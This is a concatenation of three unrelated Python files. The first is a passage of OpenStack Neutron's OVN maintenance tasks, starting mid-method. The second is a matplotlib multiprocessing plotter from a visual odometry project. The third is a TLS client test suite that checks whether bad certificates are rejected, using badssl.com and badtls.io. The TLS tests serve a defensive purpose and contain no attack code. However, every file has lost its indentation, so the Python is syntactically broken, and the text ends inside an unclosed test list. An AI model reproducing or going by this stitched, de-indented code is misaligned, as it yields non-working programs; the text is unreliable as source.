res_map['ovn_delete'](context, row.resource_uuid)
def _fix_create_update_subnet(self, context, row):
# Get the latest version of the subnet in the Neutron DB
sn_db_obj = self._ovn_client._plugin.get_subnet(
context, row.resource_uuid)
n_db_obj = self._ovn_client._plugin.get_network(
context, sn_db_obj['network_id'])
if row.revision_number == ovn_const.INITIAL_REV_NUM:
self._ovn_client.create_subnet(context, sn_db_obj, n_db_obj)
else:
self._ovn_client.update_subnet(context, sn_db_obj, n_db_obj)
# The migration will run just once per neutron-server instance. If the lock
# is held by some other neutron-server instance in the cloud, we'll attempt
# to perform the migration every 10 seconds until completed.
# TODO(jlibosva): Remove the migration to port groups at some point. It's
# been around since Queens release so it is good to drop this soon.
@periodics.periodic(spacing=10, run_immediately=True)
@rerun_on_schema_updates
def migrate_to_port_groups(self):
"""Perform the migration from Address Sets to Port Groups. """
# TODO(dalvarez): Remove this in U cycle when we're sure that all
# versions are running using Port Groups (and OVS >= 2.10).
# If Port Groups are not supported or we've already migrated, we don't
# need to attempt to migrate again.
if not self._nb_idl.get_address_sets():
raise periodics.NeverAgain()
# Only the worker holding a valid lock within OVSDB will perform the
# migration.
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
nb_sync = ovn_db_sync.OvnNbSynchronizer(
self._ovn_client._plugin, self._nb_idl, self._ovn_client._sb_idl,
None, None)
nb_sync.migrate_to_port_groups(admin_context)
raise periodics.NeverAgain()
def _log_maintenance_inconsistencies(self, create_update_inconsistencies,
delete_inconsistencies):
if not CONF.debug:
return
def _log(inconsistencies, type_):
if not inconsistencies:
return
c = {}
for f in inconsistencies:
if f.resource_type not in c:
c[f.resource_type] = 1
else:
c[f.resource_type] += 1
fail_str = ', '.join('{}={}'.format(k, v) for k, v in c.items())
LOG.debug('Maintenance task: Number of inconsistencies '
'found at %(type_)s: %(fail_str)s',
{'type_': type_, 'fail_str': fail_str})
_log(create_update_inconsistencies, INCONSISTENCY_TYPE_CREATE_UPDATE)
_log(delete_inconsistencies, INCONSISTENCY_TYPE_DELETE)
@periodics.periodic(spacing=DB_CONSISTENCY_CHECK_INTERVAL,
run_immediately=True)
def check_for_inconsistencies(self):
# Only the worker holding a valid lock within OVSDB will run
# this periodic
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
create_update_inconsistencies = (
revision_numbers_db.get_inconsistent_resources(admin_context))
delete_inconsistencies = (
revision_numbers_db.get_deleted_resources(admin_context))
if not any([create_update_inconsistencies, delete_inconsistencies]):
LOG.debug('Maintenance task: No inconsistencies found. Skipping')
return
LOG.debug('Maintenance task: Synchronizing Neutron '
'and OVN databases')
self._log_maintenance_inconsistencies(create_update_inconsistencies,
delete_inconsistencies)
self._sync_timer.restart()
dbg_log_msg = ('Maintenance task: Fixing resource %(res_uuid)s '
'(type: %(res_type)s) at %(type_)s')
# Fix the create/update resources inconsistencies
for row in create_update_inconsistencies:
LOG.debug(dbg_log_msg, {'res_uuid': row.resource_uuid,
'res_type': row.resource_type,
'type_': INCONSISTENCY_TYPE_CREATE_UPDATE})
try:
# NOTE(lucasagomes): The way to fix subnets is a bit
# different than for other resources. A subnet in OVN language
# is just a DHCP rule, but this rule only exists if the
# subnet in Neutron has the "enable_dhcp" attribute set
# to True. So, it's possible to have a consistent subnet
# resource even when it does not exist in the OVN database.
if row.resource_type == ovn_const.TYPE_SUBNETS:
self._fix_create_update_subnet(admin_context, row)
else:
self._fix_create_update(admin_context, row)
except Exception:
LOG.exception('Maintenance task: Failed to fix resource '
'%(res_uuid)s (type: %(res_type)s)',
{'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
# Fix the deleted resources inconsistencies
for row in delete_inconsistencies:
LOG.debug(dbg_log_msg, {'res_uuid': row.resource_uuid,
'res_type': row.resource_type,
'type_': INCONSISTENCY_TYPE_DELETE})
try:
if row.resource_type == ovn_const.TYPE_SUBNETS:
self._ovn_client.delete_subnet(admin_context,
row.resource_uuid)
else:
self._fix_delete(admin_context, row)
except Exception:
LOG.exception('Maintenance task: Failed to fix deleted '
'resource %(res_uuid)s (type: %(res_type)s)',
{'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
self._sync_timer.stop()
LOG.info('Maintenance task: Synchronization finished '
'(took %.2f seconds)', self._sync_timer.elapsed())
def _create_lrouter_port(self, context, port):
router_id = port['device_id']
iface_info = self._ovn_client._l3_plugin._add_neutron_router_interface(
context, router_id, {'port_id': port['id']}, may_exist=True)
self._ovn_client.create_router_port(context, router_id, iface_info)
def _check_subnet_global_dhcp_opts(self):
inconsistent_subnets = []
admin_context = n_context.get_admin_context()
subnet_filter = {'enable_dhcp': [True]}
neutron_subnets = self._ovn_client._plugin.get_subnets(
admin_context, subnet_filter)
global_v4_opts = ovn_conf.get_global_dhcpv4_opts()
global_v6_opts = ovn_conf.get_global_dhcpv6_opts()
LOG.debug('Checking %s subnets for global DHCP option consistency',
len(neutron_subnets))
for subnet in neutron_subnets:
ovn_dhcp_opts = self._nb_idl.get_subnet_dhcp_options(
subnet['id'])['subnet']
inconsistent_opts = []
if ovn_dhcp_opts:
if subnet['ip_version'] == n_const.IP_VERSION_4:
for opt, value in global_v4_opts.items():
if value != ovn_dhcp_opts['options'].get(opt, None):
inconsistent_opts.append(opt)
if subnet['ip_version'] == n_const.IP_VERSION_6:
for opt, value in global_v6_opts.items():
if value != ovn_dhcp_opts['options'].get(opt, None):
inconsistent_opts.append(opt)
if inconsistent_opts:
LOG.debug('Subnet %s has inconsistent DHCP opts: %s',
subnet['id'], inconsistent_opts)
inconsistent_subnets.append(subnet)
return inconsistent_subnets
def _create_floatingip_and_pf(self, context, floatingip):
self._ovn_client.create_floatingip(context, floatingip)
self._ovn_client._l3_plugin.port_forwarding.maintenance_create(
context, floatingip)
def _update_floatingip_and_pf(self, context, floatingip):
self._ovn_client.update_floatingip(context, floatingip)
self._ovn_client._l3_plugin.port_forwarding.maintenance_update(
context, floatingip)
def _delete_floatingip_and_pf(self, context, fip_id):
self._ovn_client._l3_plugin.port_forwarding.maintenance_delete(
context, fip_id)
self._ovn_client.delete_floatingip(context, fip_id)
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600,
run_immediately=True)
def check_global_dhcp_opts(self):
# This periodic task is included in DBInconsistenciesPeriodics since
# it uses the lock to ensure only one worker is executing
if not self.has_lock:
return
if (not ovn_conf.get_global_dhcpv4_opts() and
not ovn_conf.get_global_dhcpv6_opts()):
# No need to scan the subnets if the settings are unset.
raise periodics.NeverAgain()
LOG.debug('Maintenance task: Checking DHCP options on subnets')
self._sync_timer.restart()
fix_subnets = self._check_subnet_global_dhcp_opts()
if fix_subnets:
admin_context = n_context.get_admin_context()
LOG.debug('Triggering update for %s subnets', len(fix_subnets))
for subnet in fix_subnets:
neutron_net = self._ovn_client._plugin.get_network(
admin_context, subnet['network_id'])
try:
self._ovn_client.update_subnet(admin_context, subnet,
neutron_net)
except Exception:
LOG.exception('Failed to update subnet %s',
subnet['id'])
self._sync_timer.stop()
LOG.info('Maintenance task: DHCP options check finished '
'(took %.2f seconds)', self._sync_timer.elapsed())
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=1800, run_immediately=True)
def check_metadata_ports(self):
# If OVN metadata is disabled, do not run this task again
if not ovn_conf.is_ovn_metadata_enabled():
raise periodics.NeverAgain()
# Make sure that only one worker is executing this
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
for n in self._ovn_client._plugin.get_networks(admin_context):
self._ovn_client.create_metadata_port(admin_context, n)
raise periodics.NeverAgain()
# TODO(lucasagomes): Remove this in the U cycle
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_port_security_unknown_address(self):
if not self.has_lock:
return
for port in self._nb_idl.lsp_list().execute(check_error=True):
if port.type == ovn_const.LSP_TYPE_LOCALNET:
continue
addresses = port.addresses
type_ = port.type.strip()
if not port.port_security:
if not type_ and ovn_const.UNKNOWN_ADDR not in addresses:
addresses.append(ovn_const.UNKNOWN_ADDR)
elif type_ and ovn_const.UNKNOWN_ADDR in addresses:
addresses.remove(ovn_const.UNKNOWN_ADDR)
else:
if type_ and ovn_const.UNKNOWN_ADDR in addresses:
addresses.remove(ovn_const.UNKNOWN_ADDR)
elif not type_ and ovn_const.UNKNOWN_ADDR in addresses:
addresses.remove(ovn_const.UNKNOWN_ADDR)
if addresses:
self._nb_idl.lsp_set_addresses(
port.name, addresses=addresses).execute(check_error=True)
else:
self._nb_idl.db_clear(
'Logical_Switch_Port', port.name,
'addresses').execute(check_error=True)
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_fragmentation_support(self):
if not self.has_lock:
return
context = n_context.get_admin_context()
for net in self._ovn_client._plugin.get_networks(
context, {external_net.EXTERNAL: [True]}):
self._ovn_client.set_gateway_mtu(context, net)
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_igmp_snoop_support(self):
if not self.has_lock:
return
with self._nb_idl.transaction(check_error=True) as txn:
value = ('true' if ovn_conf.is_igmp_snooping_enabled()
else 'false')
for ls in self._nb_idl.ls_list().execute(check_error=True):
if (ls.other_config.get(ovn_const.MCAST_SNOOP,
None) == value or not ls.name):
continue
txn.add(self._nb_idl.db_set(
'Logical_Switch', ls.name,
('other_config', {
ovn_const.MCAST_SNOOP: value,
ovn_const.MCAST_FLOOD_UNREGISTERED: 'false'})))
raise periodics.NeverAgain()
def _delete_default_ha_chassis_group(self, txn):
# TODO(lucasagomes): Remove the deletion of the
# HA_CHASSIS_GROUP_DEFAULT_NAME in the Y cycle. We no longer
# have a default HA Chassis Group.
cmd = [self._nb_idl.ha_chassis_group_del(
ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME, if_exists=True)]
self._ovn_client._transaction(cmd, txn=txn)
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_ha_chassis_group(self):
# If external ports are not supported, stop running
# this periodic task
if not self._ovn_client.is_external_ports_supported():
raise periodics.NeverAgain()
if not self.has_lock:
return
external_ports = self._nb_idl.db_find_rows(
'Logical_Switch_Port', ('type', '=', ovn_const.LSP_TYPE_EXTERNAL)
).execute(check_error=True)
context = n_context.get_admin_context()
with self._nb_idl.transaction(check_error=True) as txn:
for port in external_ports:
network_id = port.external_ids[
ovn_const.OVN_NETWORK_NAME_EXT_ID_KEY].replace(
ovn_const.OVN_NAME_PREFIX, '')
ha_ch_grp = self._ovn_client.sync_ha_chassis_group(
context, network_id, txn)
try:
port_ha_ch_uuid = port.ha_chassis_group[0].uuid
except IndexError:
port_ha_ch_uuid = None
if port_ha_ch_uuid != ha_ch_grp:
txn.add(self._nb_idl.set_lswitch_port(
port.name, ha_chassis_group=ha_ch_grp))
self._delete_default_ha_chassis_group(txn)
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_localnet_legacy_port_name(self):
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
cmds = []
for ls in self._nb_idl.ls_list().execute(check_error=True):
network_id = ls.name.replace('neutron-', '')
legacy_name = utils.ovn_provnet_port_name(network_id)
legacy_port = None
segment_id = None
for lsp in ls.ports:
if legacy_name == lsp.name:
legacy_port = lsp
break
else:
continue
for segment in segments_db.get_network_segments(
admin_context, network_id):
if (segment.get(segment_def.PHYSICAL_NETWORK) ==
legacy_port.options['network_name']):
segment_id = segment['id']
break
if not segment_id:
continue
new_p_name = utils.ovn_provnet_port_name(segment_id)
cmds.append(self._nb_idl.db_set('Logical_Switch_Port',
legacy_port.uuid,
('name', new_p_name)))
if cmds:
with self._nb_idl.transaction(check_error=True) as txn:
for cmd in cmds:
txn.add(cmd)
raise periodics.NeverAgain()
# TODO(lucasagomes): Remove this in the Y cycle
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_mcast_flood_reports(self):
if not self.has_lock:
return
cmds = []
for port in self._nb_idl.lsp_list().execute(check_error=True):
port_type = port.type.strip()
if port_type in ("vtep", ovn_const.LSP_TYPE_LOCALPORT, "router"):
continue
options = port.options
if ovn_const.LSP_OPTIONS_MCAST_FLOOD_REPORTS in options:
continue
options.update({ovn_const.LSP_OPTIONS_MCAST_FLOOD_REPORTS: 'true'})
if port_type == ovn_const.LSP_TYPE_LOCALNET:
options.update({ovn_const.LSP_OPTIONS_MCAST_FLOOD: 'false'})
cmds.append(self._nb_idl.lsp_set_options(port.name, **options))
if cmds:
with self._nb_idl.transaction(check_error=True) as txn:
for cmd in cmds:
txn.add(cmd)
raise periodics.NeverAgain()
class HashRingHealthCheckPeriodics(object):
def __init__(self, group):
self._group = group
self.ctx = n_context.get_admin_context()
@periodics.periodic(spacing=ovn_const.HASH_RING_TOUCH_INTERVAL)
def touch_hash_ring_nodes(self):
# NOTE(lucasagomes): Note that we do not rely on the OVSDB lock
# here because we want the maintenance tasks from each instance to
# execute this task.
hash_ring_db.touch_nodes_from_host(self.ctx, self._group)
|
mplot_thread.py | """
Project: Visual Odometry
Name : Heru-05 | M09158023
Date
"""
import time
import sys
import numpy as np
import platform
import matplotlib.pyplot as plt
from mpl_toolkits import mplot3d
import multiprocessing as mp
from multiprocessing import Process, Queue, Lock, RLock, Value
import ctypes
kPlotSleep = 0.04
kVerbose = False
kSetDaemon = True # from https://docs.python.org/3/library/threading.html#threading.Thread.daemon
# The entire Python program exits when no alive non-daemon threads are left.
kUseFigCanvasDrawIdle = True
# global lock for drawing with matplotlib
mp_lock = RLock()
if kUseFigCanvasDrawIdle:
plt.ion()
# use a matplotlib figure to draw dynamic 2D data
class Mplot2d:
def __init__(self, xlabel='', ylabel='', title=''):
self.xlabel = xlabel
self.ylabel = ylabel
self.title = title
self.data = None
self.got_data = False
self.axis_computed = False
self.xlim = [float("inf"),float("-inf")]
self.ylim = [float("inf"),float("-inf")]
self.key = Value('i',0)
self.is_running = Value('i',1)
self.handle_map = {}
self.queue = Queue()
self.vp = Process(target=self.drawer_thread, args=(self.queue,mp_lock,self.key,self.is_running,))
self.vp.daemon = kSetDaemon
self.vp.start()
def quit(self):
self.is_running.value = 0
self.vp.join(timeout=5)
def drawer_thread(self, queue, lock, key, is_running):
self.init(lock)
#print('starting drawer_thread')
while is_running.value == 1:
#print('drawer_refresh step')
self.drawer_refresh(queue, lock)
if kUseFigCanvasDrawIdle:
time.sleep(kPlotSleep)
print(mp.current_process().name,'closing fig ', self.fig)
plt.close(self.fig)
def drawer_refresh(self, queue, lock):
while not queue.empty():
self.got_data = True
self.data = queue.get()
xy_signal, name, color, marker = self.data
#print(mp.current_process().name,"refreshing : signal ", name)
if name in self.handle_map:
handle = self.handle_map[name]
handle.set_xdata(np.append(handle.get_xdata(), xy_signal[0]))
handle.set_ydata(np.append(handle.get_ydata(), xy_signal[1]))
else:
handle, = self.ax.plot(xy_signal[0], xy_signal[1], c=color, marker=marker, label=name)
self.handle_map[name] = handle
#print(mp.current_process().name,"got data: ", self.got_data)
if self.got_data is True:
self.plot_refresh(lock)
def on_key_press(self, event):
#print(mp.current_process().name,"key event pressed...", self._key)
self.key.value = ord(event.key) # convert to int
def on_key_release(self, event):
#print(mp.current_process().name,"key event released...", self._key)
self.key.value = 0 # reset to no key symbol
def get_key(self):
return chr(self.key.value)
def init(self, lock):
lock.acquire()
if kVerbose:
print(mp.current_process().name,"initializing...")
self.fig = plt.figure()
if kUseFigCanvasDrawIdle:
self.fig.canvas.draw_idle()
self.fig.canvas.mpl_connect('key_press_event', self.on_key_press)
self.fig.canvas.mpl_connect('key_release_event', self.on_key_release)
#self.ax = self.fig.gca(projection='3d')
#self.ax = self.fig.gca()
self.ax = self.fig.add_subplot(111)
if self.title != '':
self.ax.set_title(self.title)
self.ax.set_xlabel(self.xlabel)
self.ax.set_ylabel(self.ylabel)
self.ax.grid()
# Autoscale on the unknown axis and use known lims on the other
self.ax.set_autoscaley_on(True)
#self.refresh()
lock.release()
def setAxis(self):
self.ax.legend()
self.ax.relim()
self.ax.autoscale_view()
#We need to draw *and* flush
if not kUseFigCanvasDrawIdle:
self.fig.canvas.draw()
self.fig.canvas.flush_events()
def draw(self, xy_signal, name, color='r', marker='.'):
if self.queue is None:
return
self.queue.put((xy_signal, name, color, marker))
def updateMinMax(self, np_signal):
xmax,ymax = np.amax(np_signal,axis=0)
xmin,ymin = np.amin(np_signal,axis=0)
cx = 0.5*(xmax+xmin)
cy = 0.5*(ymax+ymin)
if False:
# update maxs
if xmax > self.xlim[1]:
self.xlim[1] = xmax
if ymax > self.ylim[1]:
self.ylim[1] = ymax
# update mins
if xmin < self.xlim[0]:
self.xlim[0] = xmin
if ymin < self.ylim[0]:
self.ylim[0] = ymin
# make axis actually squared
if True:
smin = min(xmin,ymin)
smax = max(xmax,ymax)
delta = 0.5*(smax - smin)
self.xlim = [cx-delta,cx+delta]
self.ylim = [cy-delta,cy+delta]
self.axis_computed = True
def plot_refresh(self, lock):
if kVerbose:
print(mp.current_process().name,"refreshing ", self.title)
lock.acquire()
self.setAxis()
if not kUseFigCanvasDrawIdle:
plt.pause(kPlotSleep)
lock.release()
# fake
def refresh(self):
pass
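# A minimal usage sketch (hypothetical signal; draw() only enqueues the
# point, the child process does the actual plotting):
#
#     plt2d = Mplot2d(xlabel='frame', ylabel='error', title='tracking error')
#     for i in range(100):
#         plt2d.draw((i, i * 0.1), 'error', color='g', marker='.')
#         time.sleep(kPlotSleep)
#     plt2d.quit()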
# use a matplotlib figure to draw 3D trajectories
class Mplot3d:
def __init__(self, title=''):
self.title = title
self.data = None
self.got_data = False
self.axis_computed = False
self.xlim = [float("inf"),float("-inf")]
self.ylim = [float("inf"),float("-inf")]
self.zlim = [float("inf"),float("-inf")]
self.handle_map = {}
self.key = Value('i',0)
self.is_running = Value('i',1)
self.queue = Queue()
self.vp = Process(target=self.drawer_thread, args=(self.queue,mp_lock, self.key, self.is_running,))
self.vp.daemon = kSetDaemon
self.vp.start()
def quit(self):
self.is_running.value = 0
self.vp.join(timeout=5)
def drawer_thread(self, queue, lock, key, is_running):
self.init(lock)
while is_running.value == 1:
self.drawer_refresh(queue, lock)
if kUseFigCanvasDrawIdle:
time.sleep(kPlotSleep)
print(mp.current_process().name,'closing fig ', self.fig)
plt.close(self.fig)
def drawer_refresh(self, queue, lock):
while not queue.empty():
self.got_data = True
self.data = queue.get()
traj, name, color, marker = self.data
np_traj = np.asarray(traj)
if name in self.handle_map:
handle = self.handle_map[name]
handle.remove() # detach the old scatter (ax.collections.remove() was removed in matplotlib >= 3.7)
self.updateMinMax(np_traj)
handle = self.ax.scatter3D(np_traj[:, 0], np_traj[:, 1], np_traj[:, 2], c=color, marker=marker)
handle.set_label(name)
self.handle_map[name] = handle
if self.got_data is True:
self.plot_refresh(lock)
def on_key_press(self, event):
#print(mp.current_process().name,"key event pressed...", self._key)
self.key.value = ord(event.key) # convert to int
def on_key_release(self, event):
#print(mp.current_process().name,"key event released...", self._key)
self.key.value = 0 # reset to no key symbol
def get_key(self):
return chr(self.key.value)
def init(self, lock):
lock.acquire()
if kVerbose:
print(mp.current_process().name,"initializing...")
self.fig = plt.figure()
if kUseFigCanvasDrawIdle:
self.fig.canvas.draw_idle()
self.fig.canvas.mpl_connect('key_press_event', self.on_key_press)
self.fig.canvas.mpl_connect('key_release_event', self.on_key_release)
self.ax = self.fig.add_subplot(projection='3d') # gca(projection=...) was removed in matplotlib >= 3.6
if self.title != '':
self.ax.set_title(self.title)
self.ax.set_xlabel('X axis')
self.ax.set_ylabel('Y axis')
self.ax.set_zlabel('Z axis')
self.setAxis()
lock.release()
def setAxis(self):
#self.ax.axis('equal') # this does not work with the new matplotlib 3
if self.axis_computed:
self.ax.set_xlim(self.xlim)
self.ax.set_ylim(self.ylim)
self.ax.set_zlim(self.zlim)
self.ax.legend()
#We need to draw *and* flush
if not kUseFigCanvasDrawIdle:
self.fig.canvas.draw()
self.fig.canvas.flush_events()
def drawTraj(self, traj, name, color='r', marker='.'):
if self.queue is None:
return
self.queue.put((traj, name, color, marker))
def updateMinMax(self, np_traj):
xmax,ymax,zmax = np.amax(np_traj,axis=0)
xmin,ymin,zmin = np.amin(np_traj,axis=0)
cx = 0.5*(xmax+xmin)
cy = 0.5*(ymax+ymin)
cz = 0.5*(zmax+zmin)
if False:
# update maxs
if xmax > self.xlim[1]:
self.xlim[1] = xmax
if ymax > self.ylim[1]:
self.ylim[1] = ymax
if zmax > self.zlim[1]:
self.zlim[1] = zmax
# update mins
if xmin < self.xlim[0]:
self.xlim[0] = xmin
if ymin < self.ylim[0]:
self.ylim[0] = ymin
if zmin < self.zlim[0]:
self.zlim[0] = zmin
        # make the axes actually square (equal scale on all axes)
if True:
#smin = min(self.xlim[0],self.ylim[0],self.zlim[0])
#smax = max(self.xlim[1],self.ylim[1],self.zlim[1])
smin = min(xmin,ymin,zmin)
smax = max(xmax,ymax,zmax)
delta = 0.5*(smax - smin)
self.xlim = [cx-delta,cx+delta]
self.ylim = [cy-delta,cy+delta]
self.zlim = [cz-delta,cz+delta]
self.axis_computed = True
def plot_refresh(self, lock):
if kVerbose:
print(mp.current_process().name,"refreshing ", self.title)
lock.acquire()
self.setAxis()
if not kUseFigCanvasDrawIdle:
plt.pause(kPlotSleep)
lock.release()
    # no-op refresh kept for interface compatibility
    def refresh(self):
        pass
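# Usage sketch (an illustrative addition, not part of the original module): it
# assumes the module-level globals used above (mp_lock, kVerbose, kSetDaemon,
# kUseFigCanvasDrawIdle, kPlotSleep) are defined and that `time` is imported.
if __name__ == '__main__':
    plot3d = Mplot3d(title='example trajectory')
    # feed a small 3D trajectory to the drawer process
    plot3d.drawTraj([[0, 0, 0], [1, 1, 1], [2, 1, 3]], 'traj', color='r', marker='.')
    time.sleep(2)  # give the drawer process time to render
    plot3d.quit()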
|
https.py | from __future__ import absolute_import, unicode_literals
import ssl
import sys
import socket
import threading
import contextlib
try:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
except ImportError:
from http.server import HTTPServer, BaseHTTPRequestHandler
from .. import results
from ..utils import tmpfiles
from ..gencert import gencert
from ..testenv import testenv, testgroup, Test
BADTLS_CA_DATA = b"""
-----BEGIN CERTIFICATE-----
MIIDlTCCAn+gAwIBAgIIVvpPzLyqk+0wCwYJKoZIhvcNAQELMGoxaDAJBgNVBAYT
AlVTMBQGA1UECAwNTWFzc2FjaHVzZXR0czAOBgNVBAcMB05ld2J1cnkwFgYDVQQK
DA9CYWQgVExTIExpbWl0ZWQwHQYDVQQDDBZCYWQgVExTIExpbWl0ZWQgUlNBIENB
MB4XDTE2MDEwMTAwMDAwMFoXDTI2MDEwMTAwMDAwMFowajFoMAkGA1UEBhMCVVMw
FAYDVQQIDA1NYXNzYWNodXNldHRzMA4GA1UEBwwHTmV3YnVyeTAWBgNVBAoMD0Jh
ZCBUTFMgTGltaXRlZDAdBgNVBAMMFkJhZCBUTFMgTGltaXRlZCBSU0EgQ0EwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDSHu3OR1RS0D2xLKGK2Ts5eLoO
/P+IXst5WPdaD9UwGI8edfAy3U8wcMFDoXNhBQM+ZW69Z5uOZVxs704+j5cgCEAT
LbtyIrF2X8BixXFzrJFd+kpojURheyxML20GbZsznJgKzYvGqFqWa/1lYwy/v0SP
RNGPEkjFXb/tItDwrDxcuDzY6zjNlW5MwqvS11P1H8eg0idUrANY2MzT8+oyH3Sn
JLCsmulnmj1b6IZZDN4i8rKXEbH14jIsANHIgTqvS+kJf3Z1PqHAOUqVGlO3SDZd
KIqZ8olS6ty9/pco6cxvX2Te9m1z5f1fSrdxAtx7lHM3pdvs9DhML+8FAewDAgMB
AAGjQzBBMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFGEbxkZbhgwiZRAMx7Vs
VCRXl/tkMA8GA1UdDwEB/wQFAwMHBgAwCwYJKoZIhvcNAQELA4IBAQBKv0TJoRhd
wg7dPOFDVuKaLtuVzXEeUWfsA86iW4wjXFO/npI+1exSBX92MhsWk5Gjn9dO/Hq4
EZ1pMJ8hFdrOXoEHlvhnZSavtoy25ZvEoxJ9XWYPqWCmwdfB3xhT4hoEaIlu5Azf
Fw/QV5oFV8SYgwClQ+fTStxdW7CBKEX55KPUn4FOOXV5TfbLOJj3w/1V2pBTKn2f
2safgWyIpNw7OyvYVICdW5/NvD+VTBp+4PfWkTfRD5LEAxqvaGXupBaI2qGYVibJ
WQ77yy6bOvcJh4heqtIJuYg5F3vhvSGo4i5Bkx+daRKFzFwsoiexgRNTdlPCEGsQ
15WBlk3X/9bt
-----END CERTIFICATE-----
"""
@testenv
def badtls(accept, host, port, description):
with tmpfiles(BADTLS_CA_DATA) as cafile:
yield Test(
accept=accept,
description=description,
host=host,
port=port,
cafile=cafile
)
@testenv
def badssl(accept, name, description, forced_result=None):
yield Test(
accept=accept,
description=description,
host=name + ".badssl.com",
port=443,
forced_result=forced_result
)
@testenv
def badssl_onlymyca(description):
_, _, cadata = gencert("localhost")
with tmpfiles(cadata) as cafile:
yield Test(
accept=False,
description=description,
host="sha256.badssl.com",
port=443,
cafile=cafile
)
@testenv
def ssllabs(accept, port, description):
yield Test(
accept=accept,
description=description,
host="www.ssllabs.com",
port=port
)
@contextlib.contextmanager
def http_server(ssl_context, host="localhost", port=0):
class Timeout(Exception):
pass
class Server(HTTPServer):
ALLOWED_EXCEPTIONS = (socket.error,)
def handle_timeout(self):
raise Timeout()
def handle_error(self, request, client_address):
exc_type, _, _ = sys.exc_info()
if isinstance(exc_type, type) and issubclass(exc_type, self.ALLOWED_EXCEPTIONS):
return
HTTPServer.handle_error(self, request, client_address)
class Handler(BaseHTTPRequestHandler):
def setup(self):
self.request = ssl_context.wrap_socket(self.request, server_side=True)
return BaseHTTPRequestHandler.setup(self)
def do_GET(self):
self.send_response(200)
self.send_header("Content-Type", "0")
self.end_headers()
def log_message(self, format, *args):
pass
def serve(server, done):
while not done.is_set():
try:
server.handle_request()
except Timeout:
continue
break
server = Server((host, port), Handler)
try:
server.timeout = 0.1
done = threading.Event()
thread = threading.Thread(target=serve, args=[server, done])
thread.start()
try:
yield host, server.server_port
finally:
done.set()
thread.join()
finally:
server.server_close()
@testenv
def local(accept, cn, description):
certdata, keydata, cadata = gencert(cn)
with tmpfiles(certdata, keydata, cadata) as (certfile, keyfile, cafile):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(certfile, keyfile)
with http_server(context) as (host, port):
yield Test(
accept=accept,
description=description,
host=host,
port=port,
cafile=cafile,
name="{}:<temp port>".format(host)
)
@testgroup
def badssl_tests():
forced_result = None
res = yield Test(
accept=True,
description="support for TLS server name indication (SNI)",
host="badssl.com",
port=443
)
if res.type != results.Pass:
forced_result = results.Skip("could not detect SNI support")
res = yield Test(
accept=False,
description="self-signed certificate",
host="self-signed.badssl.com",
port=443,
forced_result=forced_result
)
if res.type != results.Pass and not forced_result:
forced_result = results.Skip("stub didn't reject a self-signed certificate")
yield testgroup(
badssl(False, "expired", "expired certificate", forced_result),
badssl(False, "wrong.host", "wrong hostname in certificate", forced_result),
badssl(True, "sha256", "SHA-256 signature algorithm", forced_result),
badssl(True, "1000-sans", "certificate with 1000 different Subject Alternative Names", forced_result),
badssl(False, "incomplete-chain", "incomplete chain of trust", forced_result),
badssl(False, "superfish", "Superfish CA", forced_result),
badssl(False, "edellroot", "eDellRoot CA", forced_result),
badssl(False, "dsdtestprovider", "DSDTestProvider CA", forced_result),
badssl(False, "untrusted-root", "untrusted root certificate", forced_result),
badssl(False, "rc4", "denies use of RC4 ciphers (RFC 7465)", forced_result),
badssl(False, "rc4-md5", "denies use of RC4 with MD5 ciphers", forced_result),
badssl(False, "null", "denies use of null cipher", forced_result),
badssl(False, "dh480", "denies use of 480 bit Diffie-Hellman (DH)", forced_result),
badssl(False, "dh512", "denies use of 512 bit Diffie-Hellman (DH)", forced_result)
)
ssllabs_tests = testgroup(
ssllabs(False, 10443, "protect against Apple's TLS vulnerability CVE-2014-1266"),
ssllabs(False, 10444, "protect against the FREAK attack"),
ssllabs(False, 10445, "protect against the Logjam attack")
)
badtls_tests = testgroup(
badtls(True, "domain-match.badtls.io", 10000, "valid certificate Common Name"),
badtls(True, "wildcard-match.badtls.io", 10001, "valid wildcard certificate Common Name"),
badtls(True, "san-match.badtls.io", 10002, "support for Subject Alternative Name (SAN)"),
badtls(True, "dh1024.badtls.io", 10005, "TLS handshake with 1024 bit Diffie-Hellman (DH)"),
badtls(False, "expired-1963.badtls.io", 11000, "certificate expired in year 1963"),
badtls(False, "future.badtls.io", 11001, "certificate validity starts in future"),
badtls(False, "domain-mismatch.badtls.io", 11002, "mismatch in certificate's Common Name"),
badtls(False, "san-mismatch.badtls.io", 11003, "Subject Alternative Name (SAN) mismatch"),
badtls(False, "bad-key-usage.badtls.io", 11005, "certificate has invalid key usage for HTTPS connection"),
badtls(False, "expired.badtls.io", 11006, "expired certificate"),
badtls(False, "wildcard.mismatch.badtls.io", 11007, "invalid wildcard certificate Common Name"),
badtls(False, "rc4.badtls.io", 11008, "denies use of RC4 ciphers (RFC 7465)"),
badtls(False, "weak-sig.badtls.io", 11004, "denies use of MD5 signature algorithm (RFC 6151)"),
